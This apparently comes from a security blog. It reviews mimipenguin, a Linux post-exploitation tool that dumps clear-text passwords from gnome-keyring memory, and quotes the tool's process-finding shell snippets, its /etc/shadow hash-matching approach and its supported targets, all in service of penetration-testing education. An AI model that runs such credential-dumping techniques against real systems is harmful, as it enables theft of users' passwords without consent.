Mimipenguin: Mimikatz for Linux

Share Button

Introduction

Hello guys, recently tool called “mimipengiun” was released and it’s developed by @HunterGregal, which allow you to dump clear text passwords from Linux machine just like Mimikatz in windows.

If you want to know more about Mimikatz, please follow official Mimikatz page from here http://blog.gentilkiwi.com/mimikatz

As per the author, the tool support following operating systems and applications

  • Kali 4.3.0 (rolling) x64 (gdm3)
  • Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
  • Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
  • XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2)
  • Archlinux x64 Gnome 3 (Gnome Keyring 3.20)
  • VSFTPd 3.0.3-8+b1 (Active FTP client connections)
  • Apache2 2.4.25-3 (Active/Old HTTP BASIC AUTH Sessions) [Gcore dependency]
  • openssh-server 1:7.3p1-1 (Active SSH connections – sudo usage)

Technical analysis

Let’s have a look on source code to better understand about the tool. I have taken Ubuntu code snippets

Figure 1: Ubuntu source code snippets

(uname -a | awk ‘{print tolower($0)}’) == *”ubuntu”*

The above code will check operating system. if its “Ubuntu” it will continue otherwise program will exits

$(ps -eo pid,command | sed -rn ‘/gnome\-keyring\-daemon/p’ | awk ‘BEGIN {FS = ” ” } ; { print $1 }’)

The above code will check the process “gnome-keyring-daemon” process running on the machine, if running it will get process ID and  continue to step-3 and start dumping the password in clear text, otherwise the program will exits.

The step-3 block will extract lines that have a high probability of containing clear text passwords and it will attempt to calculate each word’s probability by checking hashes in /etc/shadow, hashes in memory, and regex searches. Below is the flow diagram for mimipengium

Figure 2: Mimipengiun working flow diagram

Dumping password

I have tested this tool on x86 and x64 bit operating systems. Run the tool directly from your terminal no parameter need to pass.

Below is the proof of concept:

Supported Kali Linux x64 bit operating systems

Figure 3: Dumped clear text password in Kali Linux x64 bit systems

Supported Ubuntu x64 bit operating systems

Figure 4: Dumped clear text password in Ubuntu x64 bit systems

X86 bit systems not supported and result will be in blank

Figure 5: Blank result on x86 bit systems

Conclusion

The tool is very useful during post exploitation phase in penetration testing. During penetration testing, cracking passwords is almost impossible due to password complexity. However this tool has limited feature, but it’s very powerful to get clear text password Linux based systems.

References

https://github.com/huntergregal/mimipenguin

http://www.amazon.in/Mastering-Linux-Scripting-Andrew-Mallett/dp/1784396974 (Chapter 10: Awk Fundamentals)

http://blog.gentilkiwi.com/mimikatz

Share Button

Be the first to comment

Leave a Reply

Your email address will not be published.


*